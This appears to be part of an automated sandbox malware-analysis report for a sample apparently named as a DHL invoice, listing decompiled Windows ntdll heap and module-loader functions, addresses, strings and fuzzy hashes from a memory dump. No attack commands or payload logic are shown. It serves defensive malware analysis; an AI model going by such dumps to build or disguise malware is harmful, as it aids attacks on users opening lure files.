0x1d80f48f
0x1d80f496
0x1d80f497
0x1d80f497
0x00000000
0x1d80f49e
0x1d7cda59
0x00000000
0x00000000
0x1d7cda5b
0x1d7cda66
0x1d7cda6d
0x1d7cda6d
0x1d7cda71
0x00000000
0x00000000
0x1d7cda73
0x1d7cda77
0x1d7cda7f
0x1d7cda80
0x1d7cda84
0x1d7cda8a
0x1d80f4a8
0x1d80f4ab
0x1d80f4ab
0x1d80f4b0
0x1d80f4b3
0x1d80f4b8
0x1d80f4c1
0x1d80f4c1
0x1d80f4c4
0x1d80f4c8
0x1d80f4cb
0x1d80f4ce
0x1d80f4d5
0x1d80f4d8
0x1d80f4db
0x1d80f4e1
0x00000000
0x00000000
0x1d80f4e7
0x1d80f4ec
0x1d80f4ec
0x1d80f4f0
0x1d80f4f3
0x1d80f4f9
0x1d80f503
0x1d80f503
0x1d80f4f9
0x00000000

APIs

RtlDebugPrintTimes.NTDLL ref: 1D80F41B

Strings

Invalid heap signature for heap at %p, xrefs: 1D80F45D
RtlUnlockHeap, xrefs: 1D80F467
HEAP[%wZ]: , xrefs: 1D80F444
HEAP: , xrefs: 1D80F451
, passed to %s, xrefs: 1D80F46C

Memory Dump Source

Source File: 00000003.00000002.18146591431.000000001D770000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D770000, based on PE: true

Associated: 00000003.00000002.18149183497.000000001D899000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.18149218359.000000001D89D000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1d770000_DHL-INVOICE-MBV.jbxd

Similarity

API ID: DebugPrintTimes
String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlUnlockHeap
API String ID: 3446177414-3224558752
Opcode ID: c0750a9368536e0cdc8245d53c0e39a449510718456a638a7a00e7ae0aa8dd7e
Instruction ID: b917e7d7132394f638b0dbc49b4ab8858c74eef4394bac41eff172979eccf2c3
Opcode Fuzzy Hash: c0750a9368536e0cdc8245d53c0e39a449510718456a638a7a00e7ae0aa8dd7e
Instruction Fuzzy Hash: 34410A36918646DFC716CF68C884B6DB7A4FF45734F00C569E90947291C778A940CB93

Uniqueness

Uniqueness Score: -1.00%

Function 1D84ECD7 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 128timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 1D84EDD0
RtlDebugPrintTimes.NTDLL ref: 1D84EE45

Strings

---------------------------------------, xrefs: 1D84EDF9
HEAP: , xrefs: 1D84ECDD
Entry Heap Size , xrefs: 1D84EDED
Below is a list of potentially leaked heap entries use !heap -i Entry -h Heap for more information, xrefs: 1D84EDE3

Memory Dump Source

Source File: 00000003.00000002.18146591431.000000001D770000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D770000, based on PE: true

Associated: 00000003.00000002.18149183497.000000001D899000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.18149218359.000000001D89D000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1d770000_DHL-INVOICE-MBV.jbxd

Similarity

API ID: DebugPrintTimes
String ID: ---------------------------------------$Below is a list of potentially leaked heap entries use !heap -i Entry -h Heap for more information$Entry Heap Size $HEAP:
API String ID: 3446177414-1102453626
Opcode ID: b857812cd154ddbd3d485e274832775b6a54374dbd786457dd975d40b80b9b0b
Instruction ID: 83d70df8988dff5cc1bbbf246f20b4a70f6a84e3eb77968b512b96a2e9643054
Opcode Fuzzy Hash: b857812cd154ddbd3d485e274832775b6a54374dbd786457dd975d40b80b9b0b
Instruction Fuzzy Hash: 61416075A0522EDFC70ADF1DD484B66B7B5FF89364726C069E4889B260D731EC42CB82

Uniqueness

Uniqueness Score: -1.00%

Function 1D7CDAC0 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 84
timeCOMMON

Download Yara Rule

C-Code - Quality: 30%

			E1D7CDAC0(void* __ecx, intOrPtr _a4) {
				char _v5;
				intOrPtr* _t25;
				char* _t26;
				char _t28;
				intOrPtr _t53;
				intOrPtr* _t55;

				_t53 = _a4;
				_v5 = 0xff;
				if( *((intOrPtr*)(_t53 + 8)) == 0xddeeddee) {
					E1D869109(_t53,  &_v5);
					L5:
					_t25 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
					if(_t25 != 0) {
						if( *_t25 == 0) {
							goto L6;
						}
						_t26 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
						L7:
						if( *_t26 != 0) {
							if(( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
								E1D85F2AE(_t53);
							}
						}
						_t28 = 1;
						L9:
						return _t28;
					}
					L6:
					_t26 = 0x7ffe0380;
					goto L7;
				}
				if(( *(_t53 + 0x44) & 0x01000000) != 0) {
					_t55 =  *0x1d893768; // 0x0
					 *0x1d8991e0(_t53);
					_t28 =  *_t55();
					goto L9;
				}
				if( *((intOrPtr*)(_t53 + 0x60)) != 0xeeffeeff) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push("HEAP: ");
						E1D79B910();
					} else {
						E1D79B910("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E1D79B910("Invalid heap signature for heap at %p", _t53);
					E1D79B910(", passed to %s", "RtlLockHeap");
					_push("\n");
					E1D79B910();
					if( *((char*)( *[fs:0x30] + 2)) != 0) {
						 *0x1d8947a1 = 1;
						asm("int3");
						 *0x1d8947a1 = 0;
					}
					_t28 = 0;
					goto L9;
				} else {
					if(( *(_t53 + 0x40) & 0x00000001) == 0) {
						E1D7AFED0( *((intOrPtr*)(_t53 + 0xc8)));
						 *((short*)(_t53 + 0xe8)) =  *((short*)(_t53 + 0xe8)) + 1;
					}
					goto L5;
				}
			}

0x1d7cdac8
0x1d7cdacb
0x1d7cdad6
0x1d80f54e
0x1d7cdb0e
0x1d7cdb14
0x1d7cdb19
0x1d80f5ee
0x00000000
0x00000000
0x1d80f5fd
0x1d7cdb24
0x1d7cdb27
0x1d80f614
0x1d80f61c
0x1d80f61c
0x1d80f614
0x1d7cdb2d
0x1d7cdb2f
0x1d7cdb31
0x1d7cdb31
0x1d7cdb1f
0x1d7cdb1f
0x00000000
0x1d7cdb1f
0x1d7cdae3
0x1d80f559
0x1d80f561
0x1d80f567
0x00000000
0x1d80f567
0x1d7cdaf0
0x1d80f578
0x1d80f597
0x1d80f59c
0x1d80f57a
0x1d80f58f
0x1d80f594
0x1d80f5a8
0x1d80f5b7
0x1d80f5bc
0x1d80f5c1
0x1d80f5d3
0x1d80f5d5
0x1d80f5dc
0x1d80f5dd
0x1d80f5dd
0x1d80f5e4
0x00000000
0x1d7cdaf6
0x1d7cdafa
0x1d7cdb02
0x1d7cdb07
0x1d7cdb07
0x00000000
0x1d7cdafa

APIs

RtlDebugPrintTimes.NTDLL ref: 1D80F561

Strings

Invalid heap signature for heap at %p, xrefs: 1D80F5A3
HEAP[%wZ]: , xrefs: 1D80F58A
HEAP: , xrefs: 1D80F597
, passed to %s, xrefs: 1D80F5B2
RtlLockHeap, xrefs: 1D80F5AD

Memory Dump Source

Source File: 00000003.00000002.18146591431.000000001D770000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D770000, based on PE: true

Associated: 00000003.00000002.18149183497.000000001D899000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.18149218359.000000001D89D000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1d770000_DHL-INVOICE-MBV.jbxd

Similarity

API ID: DebugPrintTimes
String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlLockHeap
API String ID: 3446177414-1222099010
Opcode ID: b238f41fc6b6e11e25369dd4cabdbf32ea2a5de0034f9dc5cd4cf0f31a4cc035
Instruction ID: 0c1c0cc97e2e2e14d63a873e2b76133abc6ec2500b1a53f000de745764c29442
Opcode Fuzzy Hash: b238f41fc6b6e11e25369dd4cabdbf32ea2a5de0034f9dc5cd4cf0f31a4cc035
Instruction Fuzzy Hash: 5C3133765186C4EFDB1ACF28D848FAA77E4FB05B34F018895F442476A2C768B940C653

Uniqueness

Uniqueness Score: -1.00%

Function 1D7C237A Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 111
COMMON

Download Yara Rule

C-Code - Quality: 35%

			E1D7C237A(intOrPtr* __ecx, void* __edx) {
				char _v8;
				signed int _v12;
				intOrPtr* _v16;
				void* __ebx;
				intOrPtr _t22;
				intOrPtr _t29;
				signed int _t30;
				signed char _t36;
				intOrPtr _t38;
				intOrPtr* _t42;
				void* _t45;
				void* _t48;
				signed int _t50;
				intOrPtr* _t51;
				signed int _t53;
				signed int _t55;
				void* _t59;

				_t38 =  *0x1d8938b8; // 0x1
				_t50 = 0;
				_v16 = __ecx;
				_v12 = 0;
				_t55 = 0;
				if(_t38 == 0) {
					L2:
					if(_t38 == 1) {
						_t22 =  *0x1d8968d8; // 0x0
						if(_t22 != 0) {
							E1D7B3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t50, _t22);
							 *0x1d8968d8 = _t50;
							 *0x1d895d4c = _t50;
						}
					}
					 *0x1d8938b8 = _t38;
					return _t55;
				}
				_t59 =  *0x1d8968d8 - _t55; // 0x0
				if(_t59 != 0) {
					 *0x1d8938b8 = 0;
					_t55 = E1D821BB6(_t38,  &_v8);
					if(_t55 >= 0) {
						_t51 =  *0x1d8968d8; // 0x0
						while( *_t51 != 0) {
							 *0x1d8991e0(_t51, 0, 1, 1, 0, 1, 0x10);
							_v8();
							if(0 == 0) {
								_t55 = 0xc0000142;
								L21:
								_t50 = 0;
								goto L2;
							}
							_t42 = _t51;
							_t10 = _t42 + 2; // 0x2
							_t48 = _t10;
							do {
								_t29 =  *_t42;
								_t42 = _t42 + 2;
							} while (_t29 != _v12);
							_t51 = _t51 + (_t42 - _t48 >> 1) * 2 + 2;
						}
						_t30 =  *0x7ffe0330;
						_t53 =  *0x1d899218; // 0x0
						_v12 = _t30;
						_t45 = 0x20;
						_t46 = _t45 - (_t30 & 0x0000001f);
						asm("ror edi, cl");
						E1D7AFED0(0x1d8932d8);
						if( *0x1d8965f4 < 3) {
							_t46 = _v16;
							if(( *( *_v16 - 0x20) & 0x00000800) == 0) {
								E1D796704(_t46, _t53 ^ _v12);
							}
						}
						_push(0x1d8932d8);
						E1D7AE740(_t46);
						goto L21;
					}
					_t36 =  *0x1d8937c0; // 0x0
					if((_t36 & 0x00000003) != 0) {
						E1D81E692("minkernel\\ntdll\\ldrinit.c", 0xba1, "LdrpDynamicShimModule", 0, "Getting ApphelpCheckModule failed with status 0x%08lx\n", _t55);
						_t36 =  *0x1d8937c0; // 0x0
					}
					if((_t36 & 0x00000010) != 0) {
						asm("int3");
					}
					_t55 = _t50;
				}
				goto L2;
			}

0x1d7c2383
0x1d7c238b
0x1d7c238d
0x1d7c2390
0x1d7c2393
0x1d7c2397
0x1d7c23a5
0x1d7c23a8
0x1d7c23aa
0x1d7c23b1
0x1d80a878
0x1d80a87d
0x1d80a883
0x1d80a883
0x1d7c23b1
0x1d7c23ba
0x1d7c23c3
0x1d7c23c3
0x1d7c2399
0x1d7c239f
0x1d80a784
0x1d80a78f
0x1d80a793
0x1d80a7cd
0x1d80a80b
0x1d80a7e3
0x1d80a7e9
0x1d80a7ee
0x1d80a866
0x1d80a85f
0x1d80a85f
0x00000000
0x1d80a85f
0x1d80a7f0
0x1d80a7f2
0x1d80a7f2
0x1d80a7f5
0x1d80a7f5
0x1d80a7f8
0x1d80a7fb
0x1d80a808
0x1d80a808
0x1d80a812
0x1d80a817
0x1d80a81f
0x1d80a825
0x1d80a826
0x1d80a82d
0x1d80a82f
0x1d80a83b
0x1d80a83d
0x1d80a849
0x1d80a850
0x1d80a850
0x1d80a849
0x1d80a855
0x1d80a85a
0x00000000
0x1d80a85a
0x1d80a795
0x1d80a79c
0x1d80a7b4
0x1d80a7b9
0x1d80a7be
0x1d80a7c3
0x1d80a7c5
0x1d80a7c5
0x1d80a7c6
0x1d80a7c6
0x00000000

Strings

apphelp.dll, xrefs: 1D7C2382
Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 1D80A79F
LdrpDynamicShimModule, xrefs: 1D80A7A5
minkernel\ntdll\ldrinit.c, xrefs: 1D80A7AF

Memory Dump Source

Source File: 00000003.00000002.18146591431.000000001D770000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D770000, based on PE: true

Associated: 00000003.00000002.18149183497.000000001D899000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.18149218359.000000001D89D000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1d770000_DHL-INVOICE-MBV.jbxd

Similarity

API ID:
String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
API String ID: 0-176724104
Opcode ID: 9abc170c2735c8fef0c3557a452c35d4e3b6a326737356bee84070e127401337
Instruction ID: 877d4377e4fca6fb515d62a0e0d03eaab70e23d00fc025df112cba63ec45a8b4
Opcode Fuzzy Hash: 9abc170c2735c8fef0c3557a452c35d4e3b6a326737356bee84070e127401337
Instruction Fuzzy Hash: 64319972A00151EFD71C8F9ACCC4BAAB7B4FBC8B64F154229F9446B251D770AC42CB52

Uniqueness

Uniqueness Score: -1.00%

Function 1D7C0AEB Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 210
timeCOMMON

Download Yara Rule

C-Code - Quality: 56%

			E1D7C0AEB(void* __ecx) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				signed int _v36;
				signed int _v40;
				intOrPtr _t67;
				signed int _t70;
				signed int _t76;
				intOrPtr _t78;
				intOrPtr _t79;
				intOrPtr _t84;
				intOrPtr _t89;
				signed int _t90;
				intOrPtr _t93;
				signed char _t101;
				intOrPtr _t104;
				void* _t108;
				void* _t111;
				signed int _t113;
				intOrPtr* _t117;
				signed int _t119;
				intOrPtr* _t120;
				signed int _t121;
				intOrPtr* _t122;
				signed int _t126;
				void* _t130;
				void* _t131;
				signed int _t132;
				signed int _t134;
				signed int _t135;
				intOrPtr _t136;
				signed int _t137;
				signed int _t138;
				void* _t139;
				void* _t140;
				void* _t141;

				_t134 = 0;
				_t108 = __ecx;
				_v12 = 0;
				_v20 = 0;
				_t141 =  *0x1d8968d8 - _t134; // 0x0
				if(_t141 != 0) {
					_v20 = 1;
				}
				if( *0x1d8965f9 == 0) {
					_t136 =  *((intOrPtr*)(_t108 + 4));
					while(1) {
						__eflags = _t136 - _t108;
						if(_t136 == _t108) {
							break;
						}
						_t110 = _t136 - 0x54;
						E1D7D7550(_t136 - 0x54);
						_t136 =  *((intOrPtr*)(_t136 + 4));
					}
					goto L2;
				} else {
					L2:
					_v16 =  *((intOrPtr*)( *[fs:0x30] + 0x68));
					E1D7AFED0(0x1d8932d8);
					if( *0x1d8965f0 != 0) {
						_t126 =  *0x7ffe0330;
						_t135 =  *0x1d899218; // 0x0
						_t111 = 0x20;
						_t110 = _t111 - (_t126 & 0x0000001f);
						asm("ror edi, cl");
						_t134 = _t135 ^ _t126;
					}
					_t137 = 0;
					_t67 =  *((intOrPtr*)(_t108 + 4));
					_v36 = 0;
					_v32 = _t67;
					if(_t67 == _t108) {
						L11:
						_push(0x1d8932d8);
						E1D7AE740(_t110);
						return _t137;
					} else {
						_t113 = _v16 & 0x00000100;
						_v16 = _t113;
						do {
							_t138 = _t67 - 0x54;
							if(_t113 != 0) {
								_t110 = _t138;
								_t70 = E1D796DA6(_t138);
								_v36 = _t70;
								__eflags = _t70;
								if(_t70 < 0) {
									break;
								}
							}
							_t114 = _t138;
							E1D7A98DE(_t138, 0);
							if(_t134 != 0) {
								__eflags =  *0x1d8965f8;
								if(__eflags == 0) {
									_t114 = _t134;
									 *0x1d8991e0(_t138);
									 *_t134();
									 *(_t138 + 0x35) =  *(_t138 + 0x35) | 0x00000008;
								}
							}
							_t148 = _v20;
							if(_v20 == 0) {
								_t76 =  *(_t138 + 0x28);
								_t114 = _t76;
								_t130 = 0x10;
								_v8 = _t76;
								if(E1D7C1C7D(_t76, _t130, _t148) != 0) {
									_t117 = _v8;
									_t31 = _t117 + 2; // 0x2
									_t131 = _t31;
									do {
										_t78 =  *_t117;
										_t117 = _t117 + 2;
										__eflags = _t78 - _v12;
									} while (_t78 != _v12);
									_t114 = _t117 - _t131 >> 1;
									__eflags =  *0x1d8968d8;
									if( *0x1d8968d8 == 0) {
										_t33 = _t114 + 2; // 0x0
										_t79 = _t33;
									} else {
										_t104 =  *0x1d895d4c; // 0x0
										_t79 = _t104 + 1 + _t114;
									}
									_v28 = _t79;
									_t132 = E1D7B5D90(_t114,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t79 + _t79);
									_v24 = _t132;
									__eflags = _t132;
									if(_t132 != 0) {
										_t119 =  *0x1d8968d8; // 0x0
										__eflags = _t119;
										if(_t119 == 0) {
											_t120 = _v8;
											_t52 = _t120 + 2; // 0x2
											_v40 = _t52;
											do {
												_t84 =  *_t120;
												_t120 = _t120 + 2;
												__eflags = _t84 - _v12;
											} while (_t84 != _v12);
											_t121 = _t120 - _v40;
											__eflags = _t121;
											_t114 = _t121 >> 1;
											E1D7E88C0(_t132, _v8, (_t121 >> 1) + (_t121 >> 1));
											_t139 = _t139 + 0xc;
											L39:
											 *0x1d8968d8 = _v24;
											 *0x1d895d4c = _v28;
											goto L9;
										}
										_t89 =  *0x1d895d4c; // 0x0
										_t90 = _t89 + _t89;
										__eflags = _t90;
										_v40 = _t90;
										E1D7E88C0(_t132, _t119, _t90);
										_t133 = _v8;
										_t140 = _t139 + 0xc;
										_t122 = _v8;
										_t43 = _t122 + 2; // 0x2
										_v8 = _t43;
										do {
											_t93 =  *_t122;
											_t122 = _t122 + 2;
											__eflags = _t93 - _v12;
										} while (_t93 != _v12);
										_t114 = _v40 + 2;
										E1D7E88C0(_v24 + _v40 + 2, _t133, (_t122 - _v8 >> 1) + (_t122 - _v8 >> 1));
										_t139 = _t140 + 0xc;
										E1D7B3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *0x1d8968d8);
										goto L39;
									} else {
										_t101 =  *0x1d8937c0; // 0x0
										__eflags = _t101 & 0x00000003;
										if((_t101 & 0x00000003) != 0) {
											_push("Failed to allocated memory for shimmed module list\n");
											__eflags = 0;
											_push(0);
											_push("LdrpCheckModule");
											_push(0xaf4);
											_push("minkernel\\ntdll\\ldrinit.c");
											E1D81E692();
											_t101 =  *0x1d8937c0; // 0x0
											_t139 = _t139 + 0x14;
										}
										__eflags = _t101 & 0x00000010;
										if((_t101 & 0x00000010) != 0) {
											asm("int3");
										}
										goto L9;
									}
								}
							}
							L9:
							E1D7C0C2C(_t138, 1, _t114);
							 *(_t138 + 0x34) =  *(_t138 + 0x34) | 0x00000008;
							E1D7BDF36( *((intOrPtr*)(_t138 + 0x18)), _t138 + 0x24, 0x14ad);
							_t113 = _v16;
							_t67 =  *((intOrPtr*)(_v32 + 4));
							_v32 = _t67;
						} while (_t67 != _t108);
						_t137 = _v36;
						goto L11;
					}
				}
			}

0x1d7c0af6
0x1d7c0af8
0x1d7c0afa
0x1d7c0afd
0x1d7c0b00
0x1d7c0b06
0x1d809ea5
0x1d809ea5
0x1d7c0b13
0x1d7c0bd3
0x1d7c0be3
0x1d7c0be3
0x1d7c0be5
0x00000000
0x00000000
0x1d7c0bd8
0x1d7c0bdb
0x1d7c0be0
0x1d7c0be0
0x00000000
0x1d7c0b19
0x1d7c0b19
0x1d7c0b27
0x1d7c0b2a
0x1d7c0b36
0x1d7c0c0d
0x1d7c0c15
0x1d7c0c20
0x1d7c0c21
0x1d7c0c23
0x1d7c0c25
0x1d7c0c25
0x1d7c0b3e
0x1d7c0b40
0x1d7c0b43
0x1d7c0b46
0x1d7c0b4b
0x1d7c0bc2
0x1d7c0bc2
0x1d7c0bc7
0x1d7c0bd2
0x1d7c0b4d
0x1d7c0b50
0x1d7c0b56
0x1d7c0b59
0x1d7c0b59
0x1d7c0b5e
0x1d809eb1
0x1d809eb3
0x1d809eb8
0x1d809ebb
0x1d809ebd
0x00000000
0x00000000
0x1d809ec3
0x1d7c0b66
0x1d7c0b69
0x1d7c0b70
0x1d7c0bec
0x1d7c0bf3
0x1d7c0bfa
0x1d7c0bfc
0x1d7c0c02
0x1d7c0c04
0x1d7c0c04
0x1d7c0bf3
0x1d7c0b72
0x1d7c0b76
0x1d7c0b78
0x1d7c0b7b
0x1d7c0b7f
0x1d7c0b80
0x1d7c0b8a
0x1d809ec8
0x1d809ecb
0x1d809ecb
0x1d809ece
0x1d809ece
0x1d809ed1
0x1d809ed4
0x1d809ed4
0x1d809edc
0x1d809ede
0x1d809ee5
0x1d809ef1
0x1d809ef1
0x1d809ee7
0x1d809ee7
0x1d809eed
0x1d809eed
0x1d809ef4
0x1d809f0a
0x1d809f0c
0x1d809f0f
0x1d809f11
0x1d809f4e
0x1d809f54
0x1d809f56
0x1d809fbb
0x1d809fbe
0x1d809fc1
0x1d809fc4
0x1d809fc4
0x1d809fc7
0x1d809fca
0x1d809fca
0x1d809fd0
0x1d809fd0
0x1d809fd3
0x1d809fdd
0x1d809fe2
0x1d809fe5
0x1d809fe8
0x1d809ff0
0x00000000
0x1d809ff0
0x1d809f58
0x1d809f5d
0x1d809f5d
0x1d809f62
0x1d809f65
0x1d809f6a
0x1d809f6d
0x1d809f70
0x1d809f72
0x1d809f75
0x1d809f78
0x1d809f78
0x1d809f7b
0x1d809f7e
0x1d809f7e
0x1d809f93
0x1d809f9a
0x1d809f9f
0x1d809fb4
0x00000000
0x1d809f13
0x1d809f13
0x1d809f18
0x1d809f1a
0x1d809f1c
0x1d809f21
0x1d809f23
0x1d809f24
0x1d809f29
0x1d809f2e
0x1d809f33
0x1d809f38
0x1d809f3d
0x1d809f3d
0x1d809f40
0x1d809f42
0x1d809f48
0x1d809f48
0x00000000
0x1d809f42
0x1d809f11
0x1d7c0b8a
0x1d7c0b90
0x1d7c0b96
0x1d7c0ba1
0x1d7c0baa
0x1d7c0bb2
0x1d7c0bb5
0x1d7c0bb8
0x1d7c0bbb
0x1d7c0bbf
0x00000000
0x1d7c0bbf
0x1d7c0b4b

APIs

RtlDebugPrintTimes.NTDLL ref: 1D7C0BFC

Strings

LdrpCheckModule, xrefs: 1D809F24
Failed to allocated memory for shimmed module list, xrefs: 1D809F1C
minkernel\ntdll\ldrinit.c, xrefs: 1D809F2E

Memory Dump Source

Source File: 00000003.00000002.18146591431.000000001D770000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D770000, based on PE: true

Associated: 00000003.00000002.18149183497.000000001D899000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.18149218359.000000001D89D000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1d770000_DHL-INVOICE-MBV.jbxd

Similarity

API ID: DebugPrintTimes
String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
API String ID: 3446177414-161242083
Opcode ID: 35c0175d386a88c3dc062b82c4b5fea933c19ff808d2c4f699b1aa47ccd2364c
Instruction ID: 348c33df90cb8ad6b68e2f68000ea8ab6c199b23f8a0262e4f904fe9b50a6a47
Opcode Fuzzy Hash: 35c0175d386a88c3dc062b82c4b5fea933c19ff808d2c4f699b1aa47ccd2364c
Instruction Fuzzy Hash: 1F71F274A002569FCB09DF68CC94BBEB7F0FB88728F084069E945E7650E734AD41CB92

Uniqueness

Uniqueness Score: -1.00%

Function 1D7C9723 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 179
timeCOMMON

Download Yara Rule

C-Code - Quality: 66%

			E1D7C9723(signed int __ecx, void* __edx) {
				char _v4;
				intOrPtr* _v8;
				signed int _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr* _v28;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t49;
				signed int _t50;
				signed int _t60;
				signed int _t69;
				signed int _t70;
				intOrPtr _t79;
				signed int _t82;
				signed int _t83;
				intOrPtr* _t85;
				intOrPtr _t86;
				signed int _t87;
				void* _t88;
				signed int _t89;
				signed int _t93;
				signed int _t99;
				signed int* _t100;
				void* _t102;
				void* _t103;
				signed int _t104;
				intOrPtr* _t105;
				void* _t107;
				signed int _t108;
				intOrPtr* _t110;
				signed int _t112;
				signed int _t113;
				void* _t115;

				_t87 = __ecx;
				_t115 = (_t113 & 0xfffffff8) - 0x14;
				_t110 = __ecx;
				_v16 =  *[fs:0x30];
				_t82 = 0;
				_v12 = __ecx;
				_push(_t103);
				if( *((intOrPtr*)(__ecx + 0x20)) == 0xfffffffc) {
					L9:
					_t13 = _t110 + 0x20;
					 *_t13 =  *(_t110 + 0x20) | 0xffffffff;
					__eflags =  *_t13;
					E1D7CA4E3(_t82, _t87, _t103, _t110,  *_t13);
					L10:
					__eflags =  *0x1d8965f0 - _t82; // 0x0
					if(__eflags != 0) {
						_t99 =  *0x7ffe0330;
						_t83 =  *0x1d899214; // 0x0
						_t88 = 0x20;
						_t87 = _t88 - (_t99 & 0x0000001f);
						asm("ror ebx, cl");
						_t82 = _t83 ^ _t99;
					}
					E1D7AFED0(0x1d8932d8);
					_t49 =  *_t110;
					while(1) {
						_v20 = _t49;
						__eflags = _t49 - _t110;
						if(_t49 == _t110) {
							break;
						}
						_t16 = _t49 - 0x54; // 0x779e36a0
						_t108 = _t16;
						__eflags =  *(_t108 + 0x34) & 0x00000008;
						if(( *(_t108 + 0x34) & 0x00000008) != 0) {
							_push(_t87);
							_t102 = 2;
							E1D7C0C2C(_t108, _t102);
							__eflags = _t82;
							if(_t82 != 0) {
								 *0x1d8991e0(_t108);
								 *_t82();
							}
							_t87 = _t108;
							E1D7A98DE(_t87, 1);
							_t79 = _v24;
							__eflags =  *(_t79 + 0x68) & 0x00000100;
							if(( *(_t79 + 0x68) & 0x00000100) != 0) {
								_t87 = _t108;
								E1D8285AA(_t87);
							}
						}
						__eflags =  *0x1d8937c0 & 0x00000005;
						if(__eflags != 0) {
							_t43 = _t108 + 0x24; // -48
							E1D81E692("minkernel\\ntdll\\ldrsnap.c", 0xcdd, "LdrpUnloadNode", 2, "Unmapping DLL \"%wZ\"\n", _t43);
							_t115 = _t115 + 0x18;
						}
						_push(0);
						_push( *((intOrPtr*)(_t108 + 0x18)));
						E1D7CA390(_t82, _t87, _t108, _t110, __eflags);
						_t49 =  *_v28;
					}
					_push(0x1d8932d8);
					_t50 = E1D7AE740(_t87);
					while(1) {
						L3:
						_t89 =  *(_t110 + 0x18);
						if(_t89 == 0) {
							break;
						}
						_t104 =  *_t89;
						__eflags = _t104 - _t89;
						if(_t104 != _t89) {
							_t50 =  *_t104;
							 *_t89 = _t50;
						} else {
							_t32 = _t110 + 0x18;
							 *_t32 =  *(_t110 + 0x18) & 0x00000000;
							__eflags =  *_t32;
						}
						__eflags = _t104;
						if(_t104 == 0) {
							break;
						} else {
							L1D7B2330(_t50, 0x1d896668);
							_t86 =  *((intOrPtr*)(_t104 + 4));
							_t35 = _t104 + 8; // 0x8
							_t100 = _t35;
							_t93 =  *(_t86 + 0x1c);
							_t60 =  *_t93;
							_v16 = _t60;
							__eflags = _t60 - _t100;
							if(_t60 == _t100) {
								L27:
								 *_t93 =  *_t100;
								__eflags =  *(_t86 + 0x1c) - _t100;
								if(__eflags == 0) {
									asm("sbb eax, eax");
									_t69 =  ~(_t93 - _t100) & _t93;
									__eflags = _t69;
									 *(_t86 + 0x1c) = _t69;
								}
								_push( &_v4);
								E1D7BD963(_t86, _t86, 0, _t104, _t110, __eflags);
								E1D7B24D0(0x1d896668);
								__eflags = _v12;
								if(_v12 != 0) {
									E1D7C9723(_t86, 0);
								}
								_t50 = E1D7B3BC0( *0x1d895d74, 0, _t104);
								continue;
							}
							_t112 = _t60;
							do {
								_t70 =  *_t112;
								_t93 = _t112;
								_t112 = _t70;
								__eflags = _t70 - _t100;
							} while (_t70 != _t100);
							_t110 = _v8;
							goto L27;
						}
					}
					_t105 =  *_t110;
					 *(_t110 + 0x20) = 0xfffffffe;
					if(_t105 == _t110) {
						L8:
						return _t50;
					} else {
						goto L5;
					}
					do {
						L5:
						_t85 =  *_t105;
						_t107 = _t105 + 0xffffffac;
						 *(_t107 + 0x34) =  *(_t107 + 0x34) | 0x00000002;
						E1D7C9938(L1D7B2330(_t50, 0x1d896668), _t107);
						if(( *(_t107 + 0x34) & 0x00000080) != 0) {
							_t28 = _t107 + 0x74; // -56
							L1D7C9B40(_t85, _t107, _t110, 0x1d8967ac);
							_t29 = _t107 + 0x68; // -68
							L1D7C9B40(_t85, _t107, _t110, 0x1d8967a4);
							 *(_t107 + 0x20) =  *(_t107 + 0x20) & 0x00000000;
						}
						E1D7B24D0(0x1d896668);
						if( *0x1d895d70 != 0) {
							E1D7D680F(_t107);
						}
						_t50 = E1D7BD3E1(_t85, _t107, _t110);
						_t105 = _t85;
					} while (_t85 != _t110);
					goto L8;
				}
				if( *((intOrPtr*)(__ecx + 0x20)) == 7) {
					goto L10;
				}
				if( *((intOrPtr*)(__ecx + 0x20)) == 9) {
					goto L9;
				}
				goto L3;
			}

0x1d7c9723
0x1d7c972b
0x1d7c9736
0x1d7c9738
